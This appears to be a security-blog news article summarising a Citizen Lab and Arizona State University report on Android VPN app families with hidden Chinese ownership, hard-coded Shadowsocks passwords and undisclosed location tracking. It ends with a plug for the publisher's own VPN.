Popular Android VPN apps found to have security flaws and China links

People use VPNs for different security and privacy reasons, to access content anonymously, or to bypass content controls and age verification by pretending to be in different places. But not all VPNs are created equal. A recent report has revealed that many of them might allow others to sniff your data—and they’re not being honest about who’s behind them.

The report, called Hidden Links: Analyzing Secret Families of VPN Apps, comes from researchers at the University of Toronto’s Citizen Lab, and Arizona State University. It warns that several Android VPN apps for sale via the Google Play Store have security flaws that allow others to snoop on their traffic. They’re also deceiving users about their ownership, warns the report:

“The providers appear to be owned and operated by a Chinese company and have gone to great lengths to hide this fact from their 700+ million combined user bases.”

The researchers looked at the 100 most-downloaded VPNs and took the half of them that were not US-based. Then they scanned websites, business filings, and the VPN apps’ source code to try and find links between them. Using a combination of data points found in these resources, they found common software libraries, technical infrastructure, and business details that allowed them to group the VPN apps into three families.

Family A contained eight VPN applications linked to providers Innovative Connecting, Autumn Breeze, and Lemon Clove. These apps all shared some common security flaws. These included a hard-coded key used to create a password for Shadowsocks, a service designed to circumnavigate the Chinese government’s digital censorship system. This flaw enables anyone to decrypt communications sent using these apps.

From the report:

“On many of the VPNs we analyzed, a network eavesdropper between the VPN client and VPN server can use the hard-coded Shadowsocks password to decrypt all communications for all clients using the apps.”

Just as worrying is the undisclosed collection of user location data by these apps, even though the providers’ privacy policies claim that they don’t do this. They request the zip code of the user’s public IP from ip-api.com and upload it to a database, the researchers said.

The Tech Transparency Project has previously connected three providers responsible for these apps with Chinese cybersecurity firm Qihoo 360, which the US has sanctioned for its connections to the Peoples’ Liberation Army.

Family B consisted of six providers, who between them are responsible for apps including Global VPN, XY VPN, and Super Z VPN, all of which use the same VPN servers. They had hard-coded passwords for Shadowsocks, too. In general, the researchers warn against using apps that rely on Shadowsocks for anonymity. It was designed for getting around China’s censorship system, not maintaining anonymity, they said:

“It was counterintuitive to find deprecated ciphers and hard-coded passwords in these apps, given that they are security-sensitive apps and many of their providers are owned by Qihoo 360, a major chinese cybersecurity firm.”

Family C’s two providers were responsible for VPNs such as Fast Potato VPN and X-VPN, which also had security issues. This family, like the others, was also susceptible to other attacks, including what’s known as a blind in/on-path attack. This lets people manipulate traffic from a device using the app if they’re on the same network.

Why are these apps in the Play Store?

Why might companies seek to operate multiple VPNs and then hide the fact? The researchers muse that they might be trying to avoid reputational damage if something happens to one VPN. They share code because it’s simply more cost-effective to do so, the report added.

The takeaway here is that plenty of VPNs are not what they seem. That’s worrying, given that the people running the servers that the apps connect to can read all of the traffic—as can others who just reverse-engineer the passwords from the apps. So why doesn’t Google stop it?

One of the big problems is that the relationships between the different app providers are time-intensive to figure out. That makes it hard for the app store operators to automate at scale, the researchers point out. On the other hand, Google make $28.19bn in net profit for Q2 2025 alone, so maybe it could find some spare change down the back of the couch and put some manual investigators on it.

“Google is potentially exposing its brand to reputational damage by hosting and profiting from deceptive and insecure apps like the ones we investigated.”

It’s hard to know which providers to trust online. We suggest you research any security product carefully, and go for a trusted company with a solid reputation. Malwarebytes offers a VPN of our own here.